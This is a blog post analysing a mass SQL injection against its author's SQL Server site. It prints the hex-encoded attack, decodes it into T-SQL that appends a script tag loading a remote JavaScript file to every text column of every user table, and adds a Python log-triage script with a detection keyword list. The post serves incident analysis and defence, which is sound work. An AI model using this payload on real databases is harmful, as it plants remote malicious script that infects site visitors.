
Hit by a Web Page Trojan Injection (Part 4): Analyzing the Attack Method

August 11, 2013 ⁄ General

Earlier, through monitoring, I saw how the attack was carried out and captured the attack content:

    


 

To recover the attack content, I created a new stored procedure (a disclaimer: I am not familiar with SQL SERVER, so please don't laugh):

 

set ANSI_NULLS ON
set QUOTED_IDENTIFIER ON
go

-- =============================================
-- Author:  <Author,,Name>
-- Create date: <Create Date,,>
-- Description: <Description,,>
-- =============================================
CREATE PROCEDURE [dbo].[test]
 -- Add the parameters for the stored procedure here
AS
BEGIN
 -- SET NOCOUNT ON added to prevent extra result sets from
 -- interfering with SELECT statements.
 SET NOCOUNT ON;

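 -- Insert statements for procedure here
 -- CAST of the binary constant to NVARCHAR decodes it as UTF-16LE text;
 -- PRINT only displays the result and never executes it.
 -- The hex constant below is line-wrapped for display; join it into one
 -- unbroken constant before running.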

 DeCLaRE @S NvArCHaR(4000);
 SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068

0061007200280032003500350029002C004000430020005600610072006300680061007200280032

0035003500290020004400650063006C0061007200650020005400610062006C0065005F004300

7500720073006F007200200043007500720073006F007200200046006F0072002000530065006C0

0650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072

006F006D0020005300790073006F0062006A006500630074007300200041002C00530079007300

63006F006C0075006D006E00730020004200200057006800650072006500200041002E004900640

03D0042002E0049006400200041006E006400200041002E00580074007900700065003D0027007

5002700200041006E0064002000280042002E00580074007900700065003D003900390020004F0

07200200042002E00580074007900700065003D003300350020004F007200200042002E0058007

4007900700065003D0032003300310020004F007200200042002E00580074007900700065003D0

0310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073

006F00720020004600650074006300680020004E006500780074002000460072006F006D0020002

0005400610062006C0065005F0043007500720073006F007200200049006E0074006F0020004000

54002C004000430020005700680069006C006500280040004000460065007400630068005F0053

00740061007400750073003D0030002900200042006500670069006E00200045007800650063002

800270075007000640061007400650020005B0027002B00400054002B0027005D0020005300650

0740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E0

07600650072007400280056006100720063006800610072002800380030003000300029002C005B

0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700074002

0007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F00

63002E006A0073003E003C002F007300630072006900700074003E002700270027002900460065

0074006300680020004E006500780074002000460072006F006D00200020005400610062006C0

065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020

0045006E006400200043006C006F007300650020005400610062006C0065005F004300750072007

3006F00720020004400650061006C006C006F00630061007400650020005400610062006C006500

5F0043007500720073006F007200 aS NvArChAR(4000));

 print @S;
END

 

 

Executing the procedure yields the attack content:

 

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

 

 

As the content above shows, it walks the text columns of every user table and appends <script src=http://3b3.org/c.js></script> to each one.
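The same decoding can be done offline, without touching the database server. The following Python is an added example, not code from the original post: it extracts CAST(0x... AS [N]VARCHAR) literals from a logged request, decodes them, and reports which keywords from the decoded statement above are present. The sample request, the marker list and the assumption that the log stores the request URL-encoded are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Matches CAST(0x<hex> AS [N]VARCHAR...) in any letter case, as in the procedure above.
CAST_HEX = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?)varchar", re.IGNORECASE)

# Keywords taken from the decoded statement shown on this page (assumed marker list).
MARKERS = ("sysobjects", "syscolumns", "table_cursor", "exec(", "<script")


def decode_cast_payloads(request_text):
    """Return the decoded text of every CAST(0x.. AS [N]VARCHAR) literal found."""
    decoded = []
    for hex_digits, is_nvarchar in CAST_HEX.findall(unquote_plus(request_text)):
        if len(hex_digits) % 2:  # odd digit count: truncated literal, drop last digit
            hex_digits = hex_digits[:-1]
        raw = bytes.fromhex(hex_digits)
        if is_nvarchar:
            raw = raw[: len(raw) - len(raw) % 2]  # UTF-16LE needs whole 2-byte units
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def triage(request_text):
    """Return (decoded_sql, matched_markers) pairs for one logged request."""
    results = []
    for sql in decode_cast_payloads(request_text):
        lowered = sql.lower()
        results.append((sql, [m for m in MARKERS if m in lowered]))
    return results


# Constructed sample: a harmless stand-in statement, encoded the same way
# (UTF-16LE hex inside a mixed-case DECLARE/SET/CAST wrapper) as the payload above.
SAMPLE_SQL = "Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B"
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_REQUEST = ("DeCLaRE%20@S%20NvArCHaR(4000);SeT%20@S=CaSt(0x"
                  + SAMPLE_HEX + "%20aS%20NvArChAR(4000));")

if __name__ == "__main__":
    for sql, hits in triage(SAMPLE_REQUEST):
        print(hits, sql)
```

Any request that yields a non-empty marker list is worth correlating with the affected tables and the time the script tag first appeared.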

 

 

As for prevention, there is one very simple method; I will write it up when I have time!
